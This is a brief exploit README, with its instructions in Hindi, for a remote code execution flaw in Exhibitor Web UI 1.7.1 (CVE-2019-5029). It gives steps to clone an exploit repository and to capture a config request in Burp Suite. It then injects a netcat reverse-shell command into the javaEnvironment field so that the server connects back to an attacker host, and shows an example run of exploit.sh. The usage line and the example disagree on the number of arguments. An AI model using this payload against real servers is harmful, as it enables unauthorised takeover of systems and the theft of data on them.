
Exihibitor Web Ui 1.7.1 RCE, CVE-2019-5029
Exhibitor Web Ui 1.7.1 RCE, CVE-2019-5029
$ git clone https://github.com/thehunt1s0n/Exihibitor-RCE/
$ cd Exihibitor-RCE/
आपको स्क्रिप्ट में json डेटा पेलोड संपादित करने की आवश्यकता हो सकती है। ऐसा करने के लिए, exihibitor के config टैब में परिवर्तन करते समय burpsuite का उपयोग करके अनुरोध को कैप्चर करें और उसे स्क्रिप्ट में curl कमांड में कॉपी-पेस्ट करें।
निम्नलिखित के साथ javaEnvironment को बदलना सुनिश्चित करें:
"javaEnvironment":"$(/bin/nc -e /bin/sh '$ATTACKER_HOST' '$ATTACKER_PORT' &)"
./exploit.sh <attacker_host> <attacker_port>
उदाहरण:
$ ./exploit.sh 192.168.197.98 8080 192.168.45.187 8080
